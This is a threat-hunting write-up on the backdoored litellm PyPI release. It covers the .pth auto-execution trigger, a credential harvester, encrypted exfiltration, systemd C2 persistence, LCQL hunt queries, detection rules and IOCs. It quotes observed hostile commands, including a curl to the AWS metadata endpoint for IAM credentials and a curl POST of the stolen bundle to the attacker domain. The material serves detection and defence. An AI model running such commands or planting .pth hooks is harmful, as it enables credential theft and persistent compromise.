On March 24, TeamPCP published backdoored versions of litellm to PyPI as part of a broader campaign that had already hit Trivy, Checkmarx KICS, and npm. The malicious package harvests every credential on the system, encrypts and exfils them, and installs a persistent C2 backdoor. The exposure window was about 5.5 hours before PyPI pulled it. I wanted to know if any of our customers were affected and what this looks like in LimaCharlie telemetry, so I built a hunt for it.

The Attack

There's already excellent analysis of the payload from HuskyHacks, Wiz, Datadog, and Snyk, so I'll focus on what matters for detection.

Two malicious versions were published. v1.82.7 had the payload in litellm/proxy/proxy_server.py and only triggered if you used litellm's proxy mode. v1.82.8 added a litellm_init.pth file to site-packages, which is significantly worse. Python's site module processes .pth files in site-packages on every interpreter startup and executes any line in them that begins with import, so the payload runs whether or not you ever import litellm. Running pip install something, running pytest, opening a Jupyter notebook, or even an IDE language server starting up will trigger it. The .pth spawns the payload in a detached background process and the user's command continues normally, so there's no visible indication anything happened.
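The mechanism is easy to reproduce harmlessly. Here is a minimal sketch using only the standard library: it writes a benign .pth file into a temporary directory and asks the site module to process that directory the way it processes site-packages at startup. The file name demo_hook.pth and the PTH_DEMO variable are made up for illustration and have nothing to do with the real payload.

```python
import os
import site
import tempfile
from pathlib import Path


def demo_pth_autoexec() -> str:
    """Show that the site module executes 'import' lines found in .pth files."""
    with tempfile.TemporaryDirectory() as tmp:
        # Hypothetical, harmless hook: a line starting with "import " is exec'd.
        Path(tmp, "demo_hook.pth").write_text(
            "import os; os.environ['PTH_DEMO'] = 'executed'\n"
        )
        os.environ.pop("PTH_DEMO", None)
        # addsitedir() adds the directory to sys.path and processes its .pth files.
        site.addsitedir(tmp)
        return os.environ.get("PTH_DEMO", "not executed")


result = demo_pth_autoexec()
print(result)
```

Nothing in the script imports a module called demo_hook; the line ran purely because the file sat in a directory that site was told to process.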

The payload itself is a three-stage chain:

- Orchestrator decodes and runs the credential collector, encrypts the output with openssl (AES-256-CBC for the data, RSA-4096-OAEP for the session key), and exfils the encrypted bundle to models.litellm[.]cloud via curl POST

- Collector harvests SSH keys, AWS/GCP/Azure creds, .env files (recursive 6-level walk), K8s secrets, crypto wallets, shell history, TLS private keys, database passwords, Docker configs. If it finds a K8s service account token, it also deploys privileged pods to every node in the cluster.

- Persistence installs a systemd user service called sysmon.service (masquerading as "System Telemetry Service") that polls checkmarx[.]zone/raw every 50 minutes for commands, downloads binaries to /tmp/pglog, and executes them

How TeamPCP got the PyPI publish token in the first place: LiteLLM's CI ran Trivy unpinned, and Trivy had already been compromised by TeamPCP in an earlier phase of the campaign. The backdoored Trivy action exfiltrated the PYPI_PUBLISH token. The LiteLLM source repo was never modified; the malicious code existed only in the published wheel.
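Checking your own workflows for the same exposure is cheap. The sketch below flags any GitHub Actions `uses:` reference that isn't pinned to a full 40-character commit SHA. It is a rough line-based check rather than a YAML parser, and the action names in the sample are hypothetical placeholders.

```python
import re

# Captures the reference after "uses:", with or without a leading list dash.
USES_RE = re.compile(r"^\s*(?:-\s*)?uses:\s*([^\s#]+)")
# A reference counts as pinned only when it ends in a full 40-hex commit SHA.
SHA_RE = re.compile(r"@[0-9a-f]{40}$")


def find_unpinned_actions(workflow_text: str) -> list[str]:
    """Return `uses:` references that are not pinned to a commit SHA."""
    unpinned = []
    for line in workflow_text.splitlines():
        match = USES_RE.match(line)
        if not match:
            continue
        ref = match.group(1).strip("'\"")
        # Local actions (./path) live in the repo itself, so skip them.
        if ref.startswith("./"):
            continue
        if not SHA_RE.search(ref):
            unpinned.append(ref)
    return unpinned


# Hypothetical workflow snippet for illustration only.
SAMPLE_WORKFLOW = """
steps:
  - uses: example-org/scanner-action@master
  - uses: example-org/checkout-action@0123456789abcdef0123456789abcdef01234567
  - name: local build
    uses: ./.github/actions/build
"""

unpinned = find_unpinned_actions(SAMPLE_WORKFLOW)
print(unpinned)
```

A tag or branch reference can be repointed by whoever controls the upstream repo, which is why only a commit SHA counts as pinned here.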

Building the Hunt

I ran this hunt using a Jupyter notebook that queries LCQL in parallel across all customer orgs and collects results into a Pandas DataFrame. The hunt is structured in two phases so Phase 2 only targets orgs that had Phase 1 hits.
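The notebook's run_queries helper isn't shown here, so the following is only a sketch of what a parallel fan-out like it could look like, not the actual implementation. It assumes a hypothetical query_fn(org, lcql) callable that returns a list of event dicts; how that callable talks to LimaCharlie is left to whatever client you use.

```python
from concurrent.futures import ThreadPoolExecutor, as_completed


def run_queries_sketch(queries, orgs, query_fn, label="", max_workers=8):
    """Run every (query, org) pair in parallel and collect events and errors.

    query_fn(org, lcql) is a hypothetical callable returning a list of dicts.
    """
    if label:
        print(f"=== {label} ===")
    events, errors = [], []
    jobs = [(name, lcql, org) for name, lcql in queries.items() for org in orgs]
    with ThreadPoolExecutor(max_workers=max_workers) as pool:
        futures = {
            pool.submit(query_fn, org, lcql): (name, org)
            for name, lcql, org in jobs
        }
        for future in as_completed(futures):
            name, org = futures[future]
            try:
                for event in future.result():
                    # Tag each row so later correlation knows where it came from.
                    events.append({**event, "query_name": name, "org_name": org})
            except Exception as exc:  # one failing org should not stop the sweep
                errors.append({"query_name": name, "org_name": org, "error": str(exc)})
    return events, errors


def fake_query_fn(org, lcql):
    """Stand-in backend for demonstration; returns canned results."""
    if org == "org-b":
        raise RuntimeError("timeout")
    return [{"hostname": "host-1"}] if org == "org-a" else []


demo_queries = {
    "ioc_attacker_dns": (
        "-336h | * | DNS_REQUEST | "
        "event/DOMAIN_NAME contains 'litellm.cloud' "
        "or event/DOMAIN_NAME contains 'checkmarx.zone'"
    ),
}
events, errors = run_queries_sketch(demo_queries, ["org-a", "org-b", "org-c"], fake_query_fn)
hit_orgs = sorted({e["org_name"] for e in events})
```

The list of tagged dicts can be passed straight to pandas.DataFrame, and hit_orgs is what scopes the second phase.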

Phase 1: Wide Sweep

Two queries across all customer orgs, all platforms, 14-day lookback:

    -336h | * | NEW_PROCESS | event/FILE_PATH contains 'python' and event/COMMAND_LINE contains 'b64decode' and event/COMMAND_LINE contains 'exec'

    -336h | * | DNS_REQUEST | event/DOMAIN_NAME contains 'litellm.cloud' or event/DOMAIN_NAME contains 'checkmarx.zone'

    PHASE1_QUERIES = {
        # Behavioral: .pth supply chain trigger
        "behavior_pth_b64_exec": (
            "-336h | * | NEW_PROCESS | "
            "event/FILE_PATH contains 'python' "
            "and event/COMMAND_LINE contains 'b64decode' "
            "and event/COMMAND_LINE contains 'exec'"
        ),
        # IOC: DNS to known TeamPCP infrastructure
        "ioc_attacker_dns": (
            "-336h | * | DNS_REQUEST | "
            "event/DOMAIN_NAME contains 'litellm.cloud' "
            "or event/DOMAIN_NAME contains 'checkmarx.zone'"
        ),
    }

    phase1_events, phase1_errors = run_queries(PHASE1_QUERIES, orgs, label="PHASE 1: WIDE SWEEP")

The behavioral query catches the .pth auto-exec trigger on any OS. The .pth file spawns python3 -c "import base64; exec(base64.b64decode('...'))", so looking for both b64decode and exec in a Python process command line is a distinctive pattern. It's behavioral rather than IOC-based, which means it works regardless of what the base64 blob contains or what domains the attacker uses. The DNS query is a straightforward known-bad domain match.
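To sanity-check the behavioral logic before running it fleet-wide, the same three substring conditions can be replayed against sample command lines locally. This is a sketch that mirrors the query in plain Python; it assumes case-sensitive matching, which may or may not be how LCQL's contains behaves, and the benign sample command lines are invented for the test.

```python
def matches_pth_trigger(file_path: str, command_line: str) -> bool:
    """Mirror the Phase 1 behavioral query: python + b64decode + exec."""
    return (
        "python" in file_path
        and "b64decode" in command_line
        and "exec" in command_line
    )


SAMPLES = [
    # Shape of the trigger described above (payload elided as in the text).
    ("/usr/bin/python3", "python3 -c \"import base64; exec(base64.b64decode('...'))\""),
    # Invented benign examples.
    ("/usr/bin/python3", "python3 -m pytest tests/"),
    ("/usr/bin/python3", "python3 -c \"import base64; print(base64.b64decode('aGk='))\""),
    ("/usr/bin/bash", "bash -c 'echo exec b64decode'"),
]

verdicts = [matches_pth_trigger(path, cmd) for path, cmd in SAMPLES]
print(verdicts)
```

Because these are plain substring checks, a string such as --executor also satisfies the exec condition, so it is the combination of all three terms that carries the signal.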

Phase 1 returned 2 hits on the behavioral query from a single host. The DNS query returned zero hits because the exfil domain (models.litellm[.]cloud) was already sinkholed by the time the hunt ran.

Phase 2: Deep Dive

Phase 2 only ran against the org that had Phase 1 hits, Linux only. Three queries targeting the encryption pipeline and persistence:

    -336h | plat == linux | NEW_PROCESS | event/FILE_PATH contains 'openssl' and event/COMMAND_LINE contains 'pkeyutl' and event/COMMAND_LINE contains 'oaep'

    -336h | plat == linux | NEW_PROCESS | event/FILE_PATH contains 'openssl' and event/COMMAND_LINE contains '-aes-256-cbc' and event/COMMAND_LINE contains '-pass file:'

    -336h | plat == linux | NEW_PROCESS | event/COMMAND_LINE contains 'systemctl' and event/COMMAND_LINE contains '--user' and event/COMMAND_LINE contains 'sysmon'

    PHASE2_QUERIES = {
        # RSA-OAEP key wrapping
        "behavior_rsa_oaep_wrap": (
            "-336h | plat == linux | NEW_PROCESS | "
            "event/FILE_PATH contains 'openssl' "
            "and event/COMMAND_LINE contains 'pkeyutl' "
            "and event/COMMAND_LINE contains 'oaep'"
        ),
        # AES-CBC file encryption with key-from-file
        "behavior_aes_file_encrypt": (
            "-336h | plat == linux | NEW_PROCESS | "
            "event/FILE_PATH contains 'openssl' "
            "and event/COMMAND_LINE contains '-aes-256-cbc' "
            "and event/COMMAND_LINE contains '-pass file:'"
        ),
        # systemd user service persistence
        "behavior_sysmon_persistence": (
            "-336h | plat == linux | NEW_PROCESS | "
            "event/COMMAND_LINE contains 'systemctl' "
            "and event/COMMAND_LINE contains '--user' "
            "and event/COMMAND_LINE contains 'sysmon'"
        ),
    }

    phase2_target = hit_orgs if hit_orgs else orgs

    phase2_events, phase2_errors = run_queries(PHASE2_QUERIES, phase2_target, label="PHASE 2: DEEP DIVE")

Both encryption queries returned hits from the same host. The persistence query returned nothing, which I'll come back to.

Correlation

After both phases complete, the notebook merges all events and maps each hit to an attack stage. It then builds a per-host matrix showing how many independent stages were observed. Multiple stages observed on the same host by different queries is a high-confidence signal; at that point you're not looking at coincidence.

    STAGE_MAP = {
        'behavior_pth_b64_exec': 'pth_trigger',
        'ioc_attacker_dns': 'dns_c2',
        'behavior_rsa_oaep_wrap': 'encryption',
        'behavior_aes_file_encrypt': 'encryption',
        'behavior_sysmon_persistence': 'persistence',
    }

    df['attack_stage'] = df['query_name'].map(STAGE_MAP)

    # Build per-host attack stage matrix
    for (hostname, org_name), group in df.groupby(['hostname', 'org_name']):
        stages = set(group['attack_stage'].dropna().unique())
        confidence = 'CONFIRMED' if len(stages) >= 3 else 'HIGH' if len(stages) >= 2 else 'INVESTIGATE'

Two attack stages confirmed on this host: the .pth trigger and the encryption pipeline.
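For anyone who wants to try the scoring without the notebook, here is a self-contained sketch of the same idea in plain Python (no pandas). The stage map and thresholds are the ones used in the hunt; the hostname, org name, and event rows are placeholders standing in for real hits.

```python
from collections import defaultdict

STAGE_MAP = {
    "behavior_pth_b64_exec": "pth_trigger",
    "ioc_attacker_dns": "dns_c2",
    "behavior_rsa_oaep_wrap": "encryption",
    "behavior_aes_file_encrypt": "encryption",
    "behavior_sysmon_persistence": "persistence",
}


def score_hosts(events):
    """Group hits by (hostname, org) and rate each host by distinct stages seen."""
    stages_by_host = defaultdict(set)
    for event in events:
        stage = STAGE_MAP.get(event["query_name"])
        if stage:
            stages_by_host[(event["hostname"], event["org_name"])].add(stage)

    matrix = {}
    for key, stages in stages_by_host.items():
        count = len(stages)
        confidence = "CONFIRMED" if count >= 3 else "HIGH" if count >= 2 else "INVESTIGATE"
        matrix[key] = {"stages": sorted(stages), "confidence": confidence}
    return matrix


# Placeholder rows shaped like the hits described in this post.
demo_events = [
    {"hostname": "host-1", "org_name": "org-a", "query_name": "behavior_pth_b64_exec"},
    {"hostname": "host-1", "org_name": "org-a", "query_name": "behavior_pth_b64_exec"},
    {"hostname": "host-1", "org_name": "org-a", "query_name": "behavior_rsa_oaep_wrap"},
    {"hostname": "host-1", "org_name": "org-a", "query_name": "behavior_aes_file_encrypt"},
]

matrix = score_hosts(demo_events)
print(matrix)
```

Note that the two openssl queries collapse into a single encryption stage, so four hits from three queries still count as two stages.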

What It Looks Like in Telemetry





The queries found the host. Now the question is what was actually happening on it. I pulled up the sensor's process tree in the LimaCharlie portal and walked the chain from the .pth trigger through to exfiltration.



The .pth trigger

The first thing visible in the tree is the parent-child relationship between a normal Python invocation and the detached subprocess spawned by the .pth file. The parent is a regular python3 process, and the child is the python3 -c orchestrator with the base64 decode payload in its command line. You can see the orchestrator then spawning the credential collector via python3 - (stdin pipe), the openssl encryption subprocesses, and the curl exfil attempt.

The second .pth trigger produced the same chain. Both times, the orchestrator spawns the same set of children: the collector, the openssl encryption pipeline, and the curl POST.





Clicking into the orchestrator's event JSON, the command line contains the full base64 blob. This is what the behavioral LCQL query matched on, the b64decode and exec pattern in the command line of a Python process:



The credential collector



The orchestrator pipes the decoded collector script into python3 - via stdin, and that process spawns everything else. The first thing the collector does is system reconnaissance. In the process tree you can see hostname, whoami, uname -a, ip addr, ip route, and printenv all firing as children of the collector process:

After the recon commands, the collector starts harvesting credentials. It spawns 19 child processes that walk through SSH keys, AWS credentials, GCP configs, Azure configs, Kubernetes secrets, database passwords, Docker configs, shell history, TLS private keys, crypto wallets (with a heavy focus on Solana), Discord and Slack webhook URLs, and API keys. Each credential type has its own set of find, cat, and curl commands in the tree.

One of the more interesting child processes is this one, which I initially didn't recognize in the tree:

Looking at the event JSON, it's hitting the AWS Instance Metadata Service at 169.254.169.254 to steal IAM role credentials:

    curl -s http://169.254.169.254/latest/meta-data/iam/security-credentials/ 2>/dev/null || true

The NETWORK_CONNECTIONS event in the tree confirms it actually made the connection. The parent process is python3 -, which is the collector. On an EC2 instance with an IAM role attached, this would return temporary credentials that give the attacker access to whatever AWS services that role has permissions for.



Encryption and exfiltration

After the collector finishes, the orchestrator encrypts everything and exfils it. The tar command bundles the encrypted payload and session key into tpcp.tar.gz:



Then curl POSTs the bundle to the attacker's endpoint. The full command line shows the exfil URL, the X-Filename header, and the temp directory path. The parent process traces back to the orchestrator (the base64 decode process):

    curl -s -o /dev/null -w %{http_code} -X POST hxxps://models.litellm[.]cloud/ -H Content-Type: application/octet-stream -H X-Filename: tpcp.tar.gz --data-binary @/tmp/tmpqx9j4clh/tpcp.tar.gz

Persistence

The collector also drops persistence. In the tree, there's a NEW_DOCUMENT event for sysmon.py being written to ~/.config/sysmon/:

That file is the C2 backdoor. Once installed as a systemd user service, it polls checkmarx[.]zone/raw every 50 minutes for a URL, downloads whatever binary it points to into /tmp/pglog, and executes it. The service name is sysmon.service with a description of "System Telemetry Service", which is designed to blend in with legitimate monitoring tools.

What didn't fire

The systemctl --user sysmon persistence query returned nothing even though the sysmon.py file was clearly written to disk. The persistence installer might not have produced a single NEW_PROCESS event with all three search terms (systemctl, --user, sysmon) in one command line, or the systemd user session may not have been available in this context. Hunting for the sysmon.py file creation via NEW_DOCUMENT events would be a better approach for catching this stage.
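A file-level follow-up could be expressed in the same shape as the Phase 2 dictionary. This is an untested sketch: it assumes NEW_DOCUMENT events expose the written path as event/FILE_PATH, and the second query additionally assumes the unit file lands in a systemd/user directory, which I did not verify on this host.

```python
PERSISTENCE_FILE_QUERIES = {
    # Backdoor script written under ~/.config/sysmon/ (path from the process tree)
    "file_sysmon_py_drop": (
        "-336h | plat == linux | NEW_DOCUMENT | "
        "event/FILE_PATH contains '.config/sysmon/sysmon.py'"
    ),
    # ASSUMPTION: the user unit is written somewhere under a systemd/user directory
    "file_sysmon_unit_drop": (
        "-336h | plat == linux | NEW_DOCUMENT | "
        "event/FILE_PATH contains 'systemd/user' "
        "and event/FILE_PATH contains 'sysmon.service'"
    ),
}

for name, query in PERSISTENCE_FILE_QUERIES.items():
    print(f"{name}: {query}")
```

Matching on the file write avoids depending on how the installer invoked systemctl, which is the likely reason the process-level query missed.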

The DNS queries also returned nothing because the exfil and C2 domains were already sinkholed by the time the hunt ran. During the original March 24 exposure window, the DNS query would have been the highest-confidence indicator since any endpoint resolving models.litellm[.]cloud or checkmarx[.]zone is either compromised or in active contact with attacker infrastructure.

From Hunt to Detection

The behavioral queries from this hunt aren't specific to TeamPCP. The .pth trigger query catches any supply chain attack that uses the .pth auto-execution mechanism with base64 encoding, which is a technique rather than an IOC. If a different actor uses the same delivery mechanism with entirely different infrastructure, the query still fires because the observable behavior in the command line is the same. The openssl queries are similarly technique-focused, and legitimate software rarely shells out to openssl pkeyutl with OAEP padding or openssl enc with AES-CBC and a key file.

The two behavioral queries that produced hits translate directly into high-fidelity LimaCharlie D&R rules. Elastic also published a rule for .pth file creation (T1546.018) that catches the persistence at the file level, but the process-level detections below are higher signal because they fire on actual execution rather than file writes.

    # .pth supply chain trigger
    # Python spawning a child via -c with base64 decode + exec in the command line.
    # Legitimate software doesn't do this. Catches the .pth auto-exec technique
    # regardless of what the payload is or what infrastructure the attacker uses.
    event: NEW_PROCESS
    op: and
    rules:
      - op: contains
        path: event/FILE_PATH
        value: python
      - op: contains
        path: event/COMMAND_LINE
        value: -c
      - op: contains
        path: event/COMMAND_LINE
        value: b64decode
      - op: contains
        path: event/COMMAND_LINE
        value: exec

    # openssl RSA-OAEP key wrapping spawned by python
    # openssl pkeyutl with OAEP padding as a child of a python process
    # is essentially never legitimate.
    event: NEW_PROCESS
    op: and
    rules:
      - op: contains
        path: event/FILE_PATH
        value: openssl
      - op: contains
        path: event/COMMAND_LINE
        value: pkeyutl
      - op: contains
        path: event/COMMAND_LINE
        value: oaep
      - op: contains
        path: event/PARENT/FILE_PATH
        value: python

The first rule is the strongest. Legitimate Python scripts don't exec base64-decoded blobs passed via -c on the command line. If something in your environment is doing that, it's worth investigating regardless. The second rule catches the RSA-OAEP key wrapping step and scopes it to python parent processes, which eliminates any legitimate sysadmin openssl usage from the detection.

For the DNS side, add models.litellm[.]cloud and checkmarx[.]zone to your DNS blocklist. Block 83.142.209[.]11 at the firewall since that's the IP behind both domains.
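If you're matching these domains against your own DNS logs outside of LimaCharlie, a suffix match is tighter than a substring match. The sketch below refangs the indicators and matches the exact name or any subdomain of it; it is stricter than the hunt query above, which matched any name containing litellm.cloud.

```python
DEFANGED_IOCS = ["models.litellm[.]cloud", "checkmarx[.]zone"]


def refang(indicator: str) -> str:
    """Turn a defanged indicator back into its real form."""
    return indicator.replace("[.]", ".").replace("hxxp", "http")


IOC_DOMAINS = {refang(ioc).lower() for ioc in DEFANGED_IOCS}


def is_ioc_domain(domain: str, iocs=IOC_DOMAINS) -> bool:
    """True if the domain is an IOC or a subdomain of one."""
    name = domain.lower().rstrip(".")  # tolerate a trailing root dot
    return any(name == ioc or name.endswith("." + ioc) for ioc in iocs)


checks = {
    "models.litellm.cloud.": is_ioc_domain("models.litellm.cloud."),
    "api.checkmarx.zone": is_ioc_domain("api.checkmarx.zone"),
    "checkmarx.zone.example.com": is_ioc_domain("checkmarx.zone.example.com"),
    "litellm.cloud": is_ioc_domain("litellm.cloud"),
}
print(checks)
```

Whether to also flag the parent litellm.cloud name is a judgment call; add it to the IOC list if you want the broader match.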

IOCs

| Indicator | Type | Description |
|---|---|---|
| models.litellm[.]cloud | Domain | Credential exfiltration endpoint |
| checkmarx[.]zone | Domain | C2 polling endpoint |
| 83.142.209[.]11 | IP | C2 infrastructure (DEMENIN B.V.) |
| 71e35aef03099cd1f2d6446734273025a163597de93912df321ef118bf135238 | SHA256 | litellm_init.pth (v1.82.8 trigger) |
| a0d229be8efcb2f9135e2ad55ba275b76ddcfeb55fa4370e0a522a5bdee0120b | SHA256 | proxy_server.py (malicious, v1.82.7 + v1.82.8) |
| d2a0d5f564628773b6af7b9c11f6b86531a875bd2d186d7081ab62748a800ebb | SHA256 | litellm-1.82.8 wheel |
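The file hashes can be checked directly on a host. This is a rough sketch that walks a directory tree and compares SHA256 digests against the three hashes above; the file-name patterns it limits itself to are my own choice to keep the sweep fast, and the self-check at the bottom uses a stand-in file, not the real payload.

```python
import hashlib
import tempfile
from pathlib import Path

KNOWN_BAD_SHA256 = {
    "71e35aef03099cd1f2d6446734273025a163597de93912df321ef118bf135238": "litellm_init.pth (v1.82.8 trigger)",
    "a0d229be8efcb2f9135e2ad55ba275b76ddcfeb55fa4370e0a522a5bdee0120b": "proxy_server.py (malicious)",
    "d2a0d5f564628773b6af7b9c11f6b86531a875bd2d186d7081ab62748a800ebb": "litellm-1.82.8 wheel",
}


def sha256_file(path, chunk_size=1 << 20):
    """Hash a file in chunks so large wheels don't load into memory at once."""
    digest = hashlib.sha256()
    with open(path, "rb") as handle:
        for chunk in iter(lambda: handle.read(chunk_size), b""):
            digest.update(chunk)
    return digest.hexdigest()


def sweep_for_iocs(root, known_bad=None, patterns=("*.pth", "proxy_server.py", "*.whl")):
    """Return (file name, description) for files under root with a known-bad hash."""
    known_bad = KNOWN_BAD_SHA256 if known_bad is None else known_bad
    hits = []
    for pattern in patterns:
        for path in Path(root).rglob(pattern):
            if not path.is_file():
                continue
            try:
                digest = sha256_file(path)
            except OSError:
                continue  # unreadable file; skip rather than abort the sweep
            if digest in known_bad:
                hits.append((path.name, known_bad[digest]))
    return hits


# Self-check with a stand-in file and a stand-in indicator.
with tempfile.TemporaryDirectory() as tmp:
    sample = Path(tmp, "pkgs", "demo_init.pth")
    sample.parent.mkdir()
    sample.write_bytes(b"placeholder content, not the real payload\n")
    demo_iocs = {sha256_file(sample): "demo indicator"}
    demo_hits = sweep_for_iocs(tmp, known_bad=demo_iocs)
    real_hits = sweep_for_iocs(tmp)
```

Point sweep_for_iocs at a site-packages directory or a pip cache to use it for real. A clean result only rules out these exact files, not a repackaged variant.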

MITRE ATT&CK

- T1195.002 - Supply Chain Compromise: Compromise Software Supply Chain

- T1546.018 - Event Triggered Execution: Python Startup Hooks (.pth)

- T1552.001 - Unsecured Credentials: Credentials in Files

- T1573.001 - Encrypted Channel: Symmetric Cryptography (AES-256-CBC)

- T1573.002 - Encrypted Channel: Asymmetric Cryptography (RSA-4096-OAEP)

- T1041 - Exfiltration Over C2 Channel

- T1543.002 - Create or Modify System Process: Systemd Service

- T1611 - Escape to Host (K8s privileged pod)

Takeaways

The .pth auto-execution mechanism is something I hadn't hunted for before this. It's a legitimate Python feature described in the site module documentation, but it's also a near-perfect persistence and initial execution vector for supply chain attacks. Any package can drop a .pth file into site-packages, and it will execute on every Python startup with no import of the package, no sandboxing, no permission check, and no user interaction. If you're running Python workloads on Linux, it's worth sweeping site-packages for unexpected .pth files periodically.
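A periodic sweep doesn't need much. The sketch below lists every .pth file in a set of directories that contains at least one line the site module would execute (a line starting with import). Function names are my own, and the demo at the bottom runs against a temporary directory with stand-in files.

```python
import site
import tempfile
from pathlib import Path


def executable_pth_lines(pth_path):
    """Return the lines of a .pth file that site would exec at startup."""
    text = Path(pth_path).read_text(encoding="utf-8", errors="replace")
    return [
        line for line in text.splitlines()
        if line.startswith(("import ", "import\t"))
    ]


def scan_for_pth_hooks(directories):
    """Map each .pth file containing executable lines to those lines."""
    findings = {}
    for directory in directories:
        root = Path(directory)
        if not root.is_dir():
            continue
        for pth in sorted(root.glob("*.pth")):
            lines = executable_pth_lines(pth)
            if lines:
                findings[str(pth)] = lines
    return findings


def default_site_dirs():
    """Global and per-user site-packages for the running interpreter."""
    dirs = list(site.getsitepackages())
    dirs.append(site.getusersitepackages())
    return dirs


# Demo against a temporary directory with stand-in files.
with tempfile.TemporaryDirectory() as tmp:
    Path(tmp, "paths_only.pth").write_text("../src\n# a comment\n")
    Path(tmp, "hook_demo.pth").write_text("import os  # stand-in for a startup hook\n")
    demo_findings = scan_for_pth_hooks([tmp])
```

Running scan_for_pth_hooks(default_site_dirs()) on a real environment will usually return a few legitimate entries, since some packaging tools ship .pth files with import lines. The output is a review list to baseline and diff over time, not a verdict.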

The thing that surprised me was how visible the encryption pipeline is in the telemetry. The orchestrator shells out to openssl three times (rand, enc, pkeyutl) and each one shows up as a distinct NEW_PROCESS event with the full command line. A pure-Python implementation using cryptography or PyCryptodome would have been completely invisible at the process level since everything would happen inside the Python interpreter without spawning any subprocesses. TeamPCP chose CLI openssl presumably for portability since it's installed on basically every Linux system, but that design decision is also the reason these queries work.
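Since each openssl call is its own process event, the three steps can be counted per host from command lines alone. The following sketch extracts the openssl subcommand from a command line and reports which of rand, enc, and pkeyutl were seen. The sample command lines are illustrative reconstructions using standard openssl flags, not the exact strings captured on the host.

```python
import shlex

OPENSSL_STEPS = {"rand", "enc", "pkeyutl"}


def openssl_subcommand(command_line):
    """Return the token following the openssl binary, or None if absent."""
    try:
        tokens = shlex.split(command_line)
    except ValueError:  # unbalanced quotes in captured telemetry
        tokens = command_line.split()
    for index, token in enumerate(tokens[:-1]):
        if token.rsplit("/", 1)[-1] == "openssl":
            return tokens[index + 1]
    return None


def pipeline_steps_seen(command_lines):
    """Which of the three encryption-pipeline steps appear in these events."""
    seen = {openssl_subcommand(cmd) for cmd in command_lines}
    return sorted(seen & OPENSSL_STEPS)


# Illustrative command lines (paths and file names are placeholders).
demo_command_lines = [
    "openssl rand -out /tmp/demo/session.key 32",
    "/usr/bin/openssl enc -aes-256-cbc -in /tmp/demo/data -out /tmp/demo/data.enc "
    "-pass file:/tmp/demo/session.key",
    "openssl pkeyutl -encrypt -pubin -inkey /tmp/demo/pub.pem -in /tmp/demo/session.key "
    "-out /tmp/demo/session.key.enc -pkeyopt rsa_padding_mode:oaep",
    "curl -s https://example.com",
]

steps = pipeline_steps_seen(demo_command_lines)
print(steps)
```

Seeing all three steps from the same parent within a short window is a much stronger signal than any single openssl invocation.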

References

- HuskyHacks - LiteLLM Credential Stealer Analysis

- Wiz - TeamPCP Trojanizes LiteLLM

- Datadog - LiteLLM and Telnyx Compromised on PyPI

- Snyk - Poisoned Scanner Backdooring LiteLLM

- Sonatype - Multi-Stage Credential Stealer

- ramimac - TeamPCP Timeline and IOCs

- HackingLZ - Decoded Defanged Payload

- GitHub Issue #24512 - Original Disclosure

- GHSA-5mg7-485q-xm76
